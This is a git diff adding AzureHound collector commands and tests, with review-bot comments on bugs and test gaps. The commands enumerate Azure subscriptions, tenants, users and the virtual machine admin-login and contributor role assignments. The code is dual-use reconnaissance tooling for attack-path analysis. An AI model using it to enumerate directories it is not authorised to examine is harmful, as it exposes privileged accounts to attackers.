+ }
+ }
+ uniqueSubIds := unique(selectedSubIds)
+
+ for item := range client.ListAzureSubscriptions(ctx) {
+ if item.Error != nil {
+ log.Error(item.Error, "unable to continue processing subscriptions")
+ return
+ } else if !filterOnSubs || contains(uniqueSubIds, item.Ok.SubscriptionId) {
+ log.V(2).Info("found subscription", "subscription", item)
+ count++
+ // the embedded struct's values override top-level properties so TenantId
+ // needs to be explicitly set.
+ data := models.Subscription{
+ Subscription: item.Ok,
+ }
+ data.TenantId = client.TenantInfo().TenantId
+ if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{
+ Kind: enums.KindAZSubscription,
+ Data: data,
+ }); !ok {
+ return
+ }
+ }
+ }
+ log.Info("finished listing all subscriptions", "count", count)
+ }()
+
+ return out
+}
diff --git a/cmd/list-subscriptions_test.go b/cmd/list-subscriptions_test.go
new file mode 100644
index 0000000..3e9f8be
--- /dev/null
+++ b/cmd/list-subscriptions_test.go
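Review bot: In listSubscriptions the expression `i.(AzureWrapper).Data.(azure.DescendantInfo)` guards only the second assertion with `ok`, so an element of descendantChannel that is not an AzureWrapper panics on the first assertion instead of reaching the logged error branch. Splitting it into `w, ok := i.(AzureWrapper)` followed by `item, ok := w.Data.(azure.DescendantInfo)` keeps both failures on the same path. That branch, like the `item.Error` branch further down, only logs and returns, so the output channel closes exactly as it does for a complete run. A consumer scoped by management group cannot tell a failed enumeration from an empty scope, which a doc comment on listSubscriptions should state, e.g. `// Errors are logged and end the stream early; the channel closes either way.`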
@@ -0,0 +1,69 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package cmd
+
+import (
+ "context"
+ "fmt"
+ "testing"
+
+ "github.com/bloodhoundad/azurehound/v2/client"
+ "github.com/bloodhoundad/azurehound/v2/client/mocks"
+ "github.com/bloodhoundad/azurehound/v2/models/azure"
+ "go.uber.org/mock/gomock"
+)
+
+func init() {
+ setupLogger()
+}
+
+func TestListSubscriptions(t *testing.T) {
+ ctrl := gomock.NewController(t)
+ defer ctrl.Finish()
+ ctx := context.Background()
+
+ mockClient := mocks.NewMockAzureClient(ctrl)
+ mockChannel := make(chan client.AzureResult[azure.Subscription])
+ mockTenant := azure.Tenant{}
+ mockError := fmt.Errorf("I'm an error")
+ mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes()
+ mockClient.EXPECT().ListAzureSubscriptions(gomock.Any()).Return(mockChannel)
+
+ go func() {
+ defer close(mockChannel)
+ mockChannel <- client.AzureResult[azure.Subscription]{
+ Ok: azure.Subscription{},
+ }
+ mockChannel <- client.AzureResult[azure.Subscription]{
+ Error: mockError,
+ }
+ mockChannel <- client.AzureResult[azure.Subscription]{
+ Ok: azure.Subscription{},
+ }
+ }()
+
+ channel := listSubscriptions(ctx, mockClient)
+ result := <-channel
+ if _, ok := result.(AzureWrapper); !ok {
+ t.Errorf("failed type assertion: got %T, want %T", result, AzureWrapper{})
+ }
+
+ if _, ok := <-channel; ok {
+ t.Error("expected channel to close from an error result but it did not")
+ }
+}
diff --git a/cmd/list-tenants.go b/cmd/list-tenants.go
new file mode 100644
index 0000000..3e02caf
--- /dev/null
+++ b/cmd/list-tenants.go
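Review bot: The producer goroutine in TestListSubscriptions sends three results on an unbuffered channel, but listSubscriptions returns at the error result, so the third send is never received, the goroutine stays blocked and `defer close(mockChannel)` never runs. Creating the channel with room for every send, `mockChannel := make(chan client.AzureResult[azure.Subscription], 3)`, lets the producer finish and makes the last check stronger: the output has to close without emitting the result queued after the error. TestListTenants and TestListUsers in this patch use the same three-send pattern on an unbuffered channel.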
@@ -0,0 +1,104 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package cmd
+
+import (
+ "context"
+ "os"
+ "os/signal"
+ "time"
+
+ "github.com/bloodhoundad/azurehound/v2/client"
+ "github.com/bloodhoundad/azurehound/v2/enums"
+ "github.com/bloodhoundad/azurehound/v2/models"
+ "github.com/bloodhoundad/azurehound/v2/panicrecovery"
+ "github.com/bloodhoundad/azurehound/v2/pipeline"
+ "github.com/spf13/cobra"
+)
+
+func init() {
+ listRootCmd.AddCommand(listTenantsCmd)
+}
+
+var listTenantsCmd = &cobra.Command{
+ Use: "tenants",
+ Long: "Lists Azure Active Directory Tenants",
+ Run: listTenantsCmdImpl,
+ SilenceUsage: true,
+}
+
+func listTenantsCmdImpl(cmd *cobra.Command, args []string) {
+ ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill)
+ defer gracefulShutdown(stop)
+
+ log.V(1).Info("testing connections")
+ azClient := connectAndCreateClient()
+ log.Info("collecting azure active directory tenants...")
+ start := time.Now()
+ stream := listTenants(ctx, azClient)
+ panicrecovery.HandleBubbledPanic(ctx, stop, log)
+ outputStream(ctx, stream)
+ duration := time.Since(start)
+ log.Info("collection completed", "duration", duration.String())
+}
+
+func listTenants(ctx context.Context, client client.AzureClient) <-chan interface{} {
+ out := make(chan interface{})
+
+ go func() {
+ defer panicrecovery.PanicRecovery()
+ defer close(out)
+
+ // Send the fully hydrated tenant that is being collected
+ collectedTenant := client.TenantInfo()
+ if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{
+ Kind: enums.KindAZTenant,
+ Data: models.Tenant{
+ Tenant: collectedTenant,
+ Collected: true,
+ },
+ }); !ok {
+ return
+ }
+ count := 1
+ for item := range client.ListAzureADTenants(ctx, true) {
+ if item.Error != nil {
+ log.Error(item.Error, "unable to continue processing tenants")
+ return
+ } else {
+ log.V(2).Info("found tenant", "tenant", item)
+ count++
+
+ // Send the remaining tenant trusts
+ if item.Ok.TenantId != collectedTenant.TenantId {
+ if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{
+ Kind: enums.KindAZTenant,
+ Data: models.Tenant{
+ Tenant: item.Ok,
+ },
+ }); !ok {
+ return
+ }
+ }
+ }
+ }
+ log.Info("finished listing all tenants", "count", count)
+ }()
+
+ return out
+}
diff --git a/cmd/list-tenants_test.go b/cmd/list-tenants_test.go
new file mode 100644
index 0000000..c0648e3
--- /dev/null
+++ b/cmd/list-tenants_test.go
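Review bot: `signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill)` in listTenantsCmdImpl registers os.Kill, which the os/signal package documents as a signal that cannot be caught, while SIGTERM, the signal service managers and container runtimes normally send to stop a process, is not registered. A run stopped that way would therefore end without the context being cancelled and without the deferred `gracefulShutdown(stop)`. I would register SIGTERM in its place, `signal.NotifyContext(cmd.Context(), os.Interrupt, syscall.SIGTERM)`, with `"syscall"` added to the import block. The same call appears in listSubscriptionsCmdImpl, listUsersCmdImpl and the three listVirtualMachine…CmdImpl functions in this patch.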
@@ -0,0 +1,69 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package cmd
+
+import (
+ "context"
+ "fmt"
+ "testing"
+
+ "github.com/bloodhoundad/azurehound/v2/client"
+ "github.com/bloodhoundad/azurehound/v2/client/mocks"
+ "github.com/bloodhoundad/azurehound/v2/models/azure"
+ "go.uber.org/mock/gomock"
+)
+
+func init() {
+ setupLogger()
+}
+
+func TestListTenants(t *testing.T) {
+ ctrl := gomock.NewController(t)
+ defer ctrl.Finish()
+ ctx := context.Background()
+
+ mockClient := mocks.NewMockAzureClient(ctrl)
+ mockChannel := make(chan client.AzureResult[azure.Tenant])
+ mockTenant := azure.Tenant{}
+ mockError := fmt.Errorf("I'm an error")
+ mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes()
+ mockClient.EXPECT().ListAzureADTenants(gomock.Any(), gomock.Any()).Return(mockChannel)
+
+ go func() {
+ defer close(mockChannel)
+ mockChannel <- client.AzureResult[azure.Tenant]{
+ Ok: azure.Tenant{},
+ }
+ mockChannel <- client.AzureResult[azure.Tenant]{
+ Error: mockError,
+ }
+ mockChannel <- client.AzureResult[azure.Tenant]{
+ Ok: azure.Tenant{},
+ }
+ }()
+
+ channel := listTenants(ctx, mockClient)
+ result := <-channel
+ if _, ok := result.(AzureWrapper); !ok {
+ t.Errorf("failed type assertion: got %T, want %T", result, AzureWrapper{})
+ }
+
+ if _, ok := <-channel; ok {
+ t.Error("expected channel to close from an error result but it did not")
+ }
+}
diff --git a/cmd/list-users.go b/cmd/list-users.go
new file mode 100644
index 0000000..be94d8a
--- /dev/null
+++ b/cmd/list-users.go
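Review bot: Every azure.Tenant in TestListTenants, including the one returned by TenantInfo, has an empty TenantId, so the `item.Ok.TenantId != collectedTenant.TenantId` branch of listTenants is never taken and the single value the test receives is the collected tenant sent before the loop. Giving the first listed tenant a distinct ID, e.g. `Ok: azure.Tenant{TenantId: "other"}`, and asserting that it arrives as a second value without `Collected` set would cover the path that emits trusted tenants. As written, the test would still pass if that branch were removed.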
@@ -0,0 +1,106 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package cmd
+
+import (
+ "context"
+ "os"
+ "os/signal"
+ "time"
+
+ "github.com/bloodhoundad/azurehound/v2/client"
+ "github.com/bloodhoundad/azurehound/v2/client/query"
+ "github.com/bloodhoundad/azurehound/v2/enums"
+ "github.com/bloodhoundad/azurehound/v2/models"
+ "github.com/bloodhoundad/azurehound/v2/panicrecovery"
+ "github.com/bloodhoundad/azurehound/v2/pipeline"
+ "github.com/spf13/cobra"
+)
+
+func init() {
+ listRootCmd.AddCommand(listUsersCmd)
+}
+
+var listUsersCmd = &cobra.Command{
+ Use: "users",
+ Long: "Lists Azure Active Directory Users",
+ Run: listUsersCmdImpl,
+ SilenceUsage: true,
+}
+
+func listUsersCmdImpl(cmd *cobra.Command, _ []string) {
+ ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill)
+ defer gracefulShutdown(stop)
+
+ log.V(1).Info("testing connections")
+ azClient := connectAndCreateClient()
+ log.Info("collecting azure active directory users...")
+ start := time.Now()
+ stream := listUsers(ctx, azClient)
+ panicrecovery.HandleBubbledPanic(ctx, stop, log)
+ outputStream(ctx, stream)
+ duration := time.Since(start)
+ log.Info("collection completed", "duration", duration.String())
+}
+
+func listUsers(ctx context.Context, client client.AzureClient) <-chan interface{} {
+ out := make(chan interface{})
+
+ params := query.GraphParams{Select: []string{
+ "accountEnabled",
+ "createdDateTime",
+ "displayName",
+ "jobTitle",
+ "lastPasswordChangeDateTime",
+ "mail",
+ "onPremisesSecurityIdentifier",
+ "onPremisesSyncEnabled",
+ "userPrincipalName",
+ "userType",
+ "id",
+ }}
+
+ go func() {
+ defer panicrecovery.PanicRecovery()
+ defer close(out)
+ count := 0
+ for item := range client.ListAzureADUsers(ctx, params) {
+ if item.Error != nil {
+ log.Error(item.Error, "unable to continue processing users")
+ return
+ } else {
+ log.V(2).Info("found user", "user", item)
+ count++
+ user := models.User{
+ User: item.Ok,
+ TenantId: client.TenantInfo().TenantId,
+ TenantName: client.TenantInfo().DisplayName,
+ }
+ if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{
+ Kind: enums.KindAZUser,
+ Data: user,
+ }); !ok {
+ return
+ }
+ }
+ }
+ log.Info("finished listing all users", "count", count)
+ }()
+
+ return out
+}
diff --git a/cmd/list-users_test.go b/cmd/list-users_test.go
new file mode 100644
index 0000000..59028e0
--- /dev/null
+++ b/cmd/list-users_test.go
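Review bot: `log.V(2).Info("found user", "user", item)` in listUsers hands the whole result to the logger, so at verbosity 2 the selected attributes (mail, userPrincipalName, onPremisesSecurityIdentifier and the rest of the Select list) can end up in the log as a second copy of the directory data, outside whatever protection is applied to the collection output; how much is rendered depends on the log sink, which is not visible here. Logging only the object's identifier would keep the trace useful without that copy. Separately, `client.TenantInfo()` is called twice per user inside the loop; reading it once before the `for`, e.g. `tenant := client.TenantInfo()`, and using `tenant.TenantId` and `tenant.DisplayName` is simpler, as listTenants already does with `collectedTenant`.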
@@ -0,0 +1,70 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package cmd
+
+import (
+ "context"
+ "fmt"
+ "testing"
+
+ "github.com/bloodhoundad/azurehound/v2/client"
+ "github.com/bloodhoundad/azurehound/v2/client/mocks"
+ "github.com/bloodhoundad/azurehound/v2/models/azure"
+ "go.uber.org/mock/gomock"
+)
+
+func init() {
+ setupLogger()
+}
+
+func TestListUsers(t *testing.T) {
+ ctrl := gomock.NewController(t)
+ defer ctrl.Finish()
+
+ ctx := context.Background()
+
+ mockClient := mocks.NewMockAzureClient(ctrl)
+ mockChannel := make(chan client.AzureResult[azure.User])
+ mockTenant := azure.Tenant{}
+ mockError := fmt.Errorf("I'm an error")
+ mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes()
+ mockClient.EXPECT().ListAzureADUsers(gomock.Any(), gomock.Any()).Return(mockChannel)
+
+ go func() {
+ defer close(mockChannel)
+ mockChannel <- client.AzureResult[azure.User]{
+ Ok: azure.User{},
+ }
+ mockChannel <- client.AzureResult[azure.User]{
+ Error: mockError,
+ }
+ mockChannel <- client.AzureResult[azure.User]{
+ Ok: azure.User{},
+ }
+ }()
+
+ channel := listUsers(ctx, mockClient)
+ result := <-channel
+ if _, ok := result.(AzureWrapper); !ok {
+ t.Errorf("failed type assertion: got %T, want %T", result, AzureWrapper{})
+ }
+
+ if _, ok := <-channel; ok {
+ t.Error("expected channel to close from an error result but it did not")
+ }
+}
diff --git a/cmd/list-virtual-machine-admin-logins.go b/cmd/list-virtual-machine-admin-logins.go
new file mode 100644
index 0000000..3bbcd30
--- /dev/null
+++ b/cmd/list-virtual-machine-admin-logins.go
@@ -0,0 +1,81 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package cmd
+
+import (
+ "context"
+ "os"
+ "os/signal"
+ "time"
+
+ "github.com/bloodhoundad/azurehound/v2/constants"
+ "github.com/bloodhoundad/azurehound/v2/enums"
+ "github.com/bloodhoundad/azurehound/v2/internal"
+ "github.com/bloodhoundad/azurehound/v2/models"
+ "github.com/bloodhoundad/azurehound/v2/panicrecovery"
+ "github.com/bloodhoundad/azurehound/v2/pipeline"
+ "github.com/spf13/cobra"
+)
+
+func init() {
+ listRootCmd.AddCommand(listVirtualMachineAdminLoginsCmd)
+}
+
+var listVirtualMachineAdminLoginsCmd = &cobra.Command{
+ Use: "virtual-machine-admin-logins",
+ Long: "Lists Azure Virtual Machine Admin Logins",
+ Run: listVirtualMachineAdminLoginsCmdImpl,
+ SilenceUsage: true,
+}
+
+func listVirtualMachineAdminLoginsCmdImpl(cmd *cobra.Command, args []string) {
+ ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill)
+ defer gracefulShutdown(stop)
+
+ log.V(1).Info("testing connections")
+ azClient := connectAndCreateClient()
+ log.Info("collecting azure virtual machine admin logins...")
+ start := time.Now()
+ subscriptions := listSubscriptions(ctx, azClient)
+ vms := listVirtualMachines(ctx, azClient, subscriptions)
+ vmRoleAssignments := listVirtualMachineRoleAssignments(ctx, azClient, vms)
+ panicrecovery.HandleBubbledPanic(ctx, stop, log)
+ stream := listVirtualMachineAdminLogins(ctx, vmRoleAssignments)
+ outputStream(ctx, stream)
+ duration := time.Since(start)
+ log.Info("collection completed", "duration", duration.String())
+}
+
+func listVirtualMachineAdminLogins(
+ ctx context.Context,
+ roleAssignments <-chan azureWrapper[models.VirtualMachineRoleAssignments],
+) <-chan any {
+ return pipeline.Map(ctx.Done(), roleAssignments, func(ra azureWrapper[models.VirtualMachineRoleAssignments]) any {
+ filteredAssignments := internal.Filter(ra.Data.RoleAssignments, vmRoleAssignmentFilter(constants.VirtualMachineAdministratorLoginRoleID))
+ adminLogins := internal.Map(filteredAssignments, func(ra models.VirtualMachineRoleAssignment) models.VirtualMachineAdminLogin {
+ return models.VirtualMachineAdminLogin{
+ VirtualMachineId: ra.VirtualMachineId,
+ AdminLogin: ra.RoleAssignment,
+ }
+ })
+ return NewAzureWrapper(enums.KindAZVMAdminLogin, models.VirtualMachineAdminLogins{
+ VirtualMachineId: ra.Data.VirtualMachineId,
+ AdminLogins: adminLogins,
+ })
+ })
+}
diff --git a/cmd/list-virtual-machine-admin-logins_test.go b/cmd/list-virtual-machine-admin-logins_test.go
new file mode 100644
index 0000000..df29f72
--- /dev/null
+++ b/cmd/list-virtual-machine-admin-logins_test.go
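Review bot: In listVirtualMachineAdminLogins the inner callback `func(ra models.VirtualMachineRoleAssignment)` reuses the name `ra` of the enclosing callback's parameter, so `ra.VirtualMachineId` inside it refers to a single assignment while `ra.Data.VirtualMachineId` a few lines later refers to the wrapper. Renaming the inner parameter, e.g. `func(assignment models.VirtualMachineRoleAssignment)`, removes the shadowing and makes it obvious which ID each field carries. listVirtualMachineAvereContributors and listVirtualMachineContributors in this patch are copies of this function that differ only in the role ID constant and the result types, and they shadow `ra` the same way. A one-line doc comment on each stating which role ID it filters on would help a reader tell the three apart.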
@@ -0,0 +1,76 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package cmd
+
+import (
+ "context"
+ "testing"
+
+ "github.com/bloodhoundad/azurehound/v2/client/mocks"
+ "github.com/bloodhoundad/azurehound/v2/constants"
+ "github.com/bloodhoundad/azurehound/v2/enums"
+ "github.com/bloodhoundad/azurehound/v2/models"
+ "github.com/bloodhoundad/azurehound/v2/models/azure"
+ "go.uber.org/mock/gomock"
+)
+
+func init() {
+ setupLogger()
+}
+
+func TestListVirtualMachineAdminLogins(t *testing.T) {
+ ctrl := gomock.NewController(t)
+ defer ctrl.Finish()
+ ctx := context.Background()
+
+ mockClient := mocks.NewMockAzureClient(ctrl)
+
+ mockVMRoleAssignmentsChannel := make(chan azureWrapper[models.VirtualMachineRoleAssignments])
+ mockTenant := azure.Tenant{}
+ mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes()
+ channel := listVirtualMachineAdminLogins(ctx, mockVMRoleAssignmentsChannel)
+
+ go func() {
+ defer close(mockVMRoleAssignmentsChannel)
+
+ mockVMRoleAssignmentsChannel <- NewAzureWrapper(
+ enums.KindAZVMRoleAssignment,
+ models.VirtualMachineRoleAssignments{
+ VirtualMachineId: "foo",
+ RoleAssignments: []models.VirtualMachineRoleAssignment{
+ {
+ RoleAssignment: azure.RoleAssignment{
+ Name: constants.VirtualMachineAdministratorLoginRoleID,
+ Properties: azure.RoleAssignmentPropertiesWithScope{
+ RoleDefinitionId: constants.VirtualMachineAdministratorLoginRoleID,
+ },
+ },
+ },
+ },
+ },
+ )
+ }()
+
+ if _, ok := <-channel; !ok {
+ t.Fatalf("failed to receive from channel")
+ }
+
+ if _, ok := <-channel; ok {
+ t.Error("should not have recieved from channel")
+ }
+}
diff --git a/cmd/list-virtual-machine-avere-contributors.go b/cmd/list-virtual-machine-avere-contributors.go
new file mode 100644
index 0000000..577582d
--- /dev/null
+++ b/cmd/list-virtual-machine-avere-contributors.go
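Review bot: TestListVirtualMachineAdminLogins discards the value it receives (`if _, ok := <-channel; !ok`), so it passes whether or not the admin-login assignment survives the filter; the mapper in listVirtualMachineAdminLogins returns a wrapper for every input, which suggests one value is emitted even when nothing matches. The test should inspect the received models.VirtualMachineAdminLogins, for instance that `AdminLogins` has length 1, and add an assignment with a different role ID to show that it is excluded. `mockClient` and its TenantInfo expectation are never passed to the function under test and can be dropped. TestListVirtualMachineAvereContributors and TestListVirtualMachineContributors in this patch have the same gaps, and all three repeat the "recieved" misspelling.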
@@ -0,0 +1,81 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package cmd
+
+import (
+ "context"
+ "os"
+ "os/signal"
+ "time"
+
+ "github.com/bloodhoundad/azurehound/v2/constants"
+ "github.com/bloodhoundad/azurehound/v2/enums"
+ "github.com/bloodhoundad/azurehound/v2/internal"
+ "github.com/bloodhoundad/azurehound/v2/models"
+ "github.com/bloodhoundad/azurehound/v2/panicrecovery"
+ "github.com/bloodhoundad/azurehound/v2/pipeline"
+ "github.com/spf13/cobra"
+)
+
+func init() {
+ listRootCmd.AddCommand(listVirtualMachineAvereContributorsCmd)
+}
+
+var listVirtualMachineAvereContributorsCmd = &cobra.Command{
+ Use: "virtual-machine-avere-contributors",
+ Long: "Lists Azure Virtual Machine Avere Contributors",
+ Run: listVirtualMachineAvereContributorsCmdImpl,
+ SilenceUsage: true,
+}
+
+func listVirtualMachineAvereContributorsCmdImpl(cmd *cobra.Command, args []string) {
+ ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill)
+ defer gracefulShutdown(stop)
+
+ log.V(1).Info("testing connections")
+ azClient := connectAndCreateClient()
+ log.Info("collecting azure virtual machine averecontributors...")
+ start := time.Now()
+ subscriptions := listSubscriptions(ctx, azClient)
+ vms := listVirtualMachines(ctx, azClient, subscriptions)
+ vmRoleAssignments := listVirtualMachineRoleAssignments(ctx, azClient, vms)
+ panicrecovery.HandleBubbledPanic(ctx, stop, log)
+ stream := listVirtualMachineAvereContributors(ctx, vmRoleAssignments)
+ outputStream(ctx, stream)
+ duration := time.Since(start)
+ log.Info("collection completed", "duration", duration.String())
+}
+
+func listVirtualMachineAvereContributors(
+ ctx context.Context,
+ roleAssignments <-chan azureWrapper[models.VirtualMachineRoleAssignments],
+) <-chan any {
+ return pipeline.Map(ctx.Done(), roleAssignments, func(ra azureWrapper[models.VirtualMachineRoleAssignments]) any {
+ filteredAssignments := internal.Filter(ra.Data.RoleAssignments, vmRoleAssignmentFilter(constants.AvereContributorRoleID))
+ avereContributors := internal.Map(filteredAssignments, func(ra models.VirtualMachineRoleAssignment) models.VirtualMachineAvereContributor {
+ return models.VirtualMachineAvereContributor{
+ VirtualMachineId: ra.VirtualMachineId,
+ AvereContributor: ra.RoleAssignment,
+ }
+ })
+ return NewAzureWrapper(enums.KindAZVMAvereContributor, models.VirtualMachineAvereContributors{
+ VirtualMachineId: ra.Data.VirtualMachineId,
+ AvereContributors: avereContributors,
+ })
+ })
+}
diff --git a/cmd/list-virtual-machine-avere-contributors_test.go b/cmd/list-virtual-machine-avere-contributors_test.go
new file mode 100644
index 0000000..b894045
--- /dev/null
+++ b/cmd/list-virtual-machine-avere-contributors_test.go
@@ -0,0 +1,76 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package cmd
+
+import (
+ "context"
+ "testing"
+
+ "github.com/bloodhoundad/azurehound/v2/client/mocks"
+ "github.com/bloodhoundad/azurehound/v2/constants"
+ "github.com/bloodhoundad/azurehound/v2/enums"
+ "github.com/bloodhoundad/azurehound/v2/models"
+ "github.com/bloodhoundad/azurehound/v2/models/azure"
+ "go.uber.org/mock/gomock"
+)
+
+func init() {
+ setupLogger()
+}
+
+func TestListVirtualMachineAvereContributors(t *testing.T) {
+ ctrl := gomock.NewController(t)
+ defer ctrl.Finish()
+ ctx := context.Background()
+
+ mockClient := mocks.NewMockAzureClient(ctrl)
+
+ mockVMRoleAssignmentsChannel := make(chan azureWrapper[models.VirtualMachineRoleAssignments])
+ mockTenant := azure.Tenant{}
+ mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes()
+ channel := listVirtualMachineAvereContributors(ctx, mockVMRoleAssignmentsChannel)
+
+ go func() {
+ defer close(mockVMRoleAssignmentsChannel)
+
+ mockVMRoleAssignmentsChannel <- NewAzureWrapper(
+ enums.KindAZVMRoleAssignment,
+ models.VirtualMachineRoleAssignments{
+ VirtualMachineId: "foo",
+ RoleAssignments: []models.VirtualMachineRoleAssignment{
+ {
+ RoleAssignment: azure.RoleAssignment{
+ Name: constants.AvereContributorRoleID,
+ Properties: azure.RoleAssignmentPropertiesWithScope{
+ RoleDefinitionId: constants.AvereContributorRoleID,
+ },
+ },
+ },
+ },
+ },
+ )
+ }()
+
+ if _, ok := <-channel; !ok {
+ t.Fatalf("failed to receive from channel")
+ }
+
+ if _, ok := <-channel; ok {
+ t.Error("should not have recieved from channel")
+ }
+}
diff --git a/cmd/list-virtual-machine-contributors.go b/cmd/list-virtual-machine-contributors.go
new file mode 100644
index 0000000..bcc6abf
--- /dev/null
+++ b/cmd/list-virtual-machine-contributors.go
@@ -0,0 +1,81 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package cmd
+
+import (
+ "context"
+ "os"
+ "os/signal"
+ "time"
+
+ "github.com/bloodhoundad/azurehound/v2/constants"
+ "github.com/bloodhoundad/azurehound/v2/enums"
+ "github.com/bloodhoundad/azurehound/v2/internal"
+ "github.com/bloodhoundad/azurehound/v2/models"
+ "github.com/bloodhoundad/azurehound/v2/panicrecovery"
+ "github.com/bloodhoundad/azurehound/v2/pipeline"
+ "github.com/spf13/cobra"
+)
+
+func init() {
+ listRootCmd.AddCommand(listVirtualMachineContributorsCmd)
+}
+
+var listVirtualMachineContributorsCmd = &cobra.Command{
+ Use: "virtual-machine-contributors",
+ Long: "Lists Azure Virtual Machine Contributors",
+ Run: listVirtualMachineContributorsCmdImpl,
+ SilenceUsage: true,
+}
+
+func listVirtualMachineContributorsCmdImpl(cmd *cobra.Command, args []string) {
+ ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill)
+ defer gracefulShutdown(stop)
+
+ log.V(1).Info("testing connections")
+ azClient := connectAndCreateClient()
+ log.Info("collecting azure virtual machine contributors...")
+ start := time.Now()
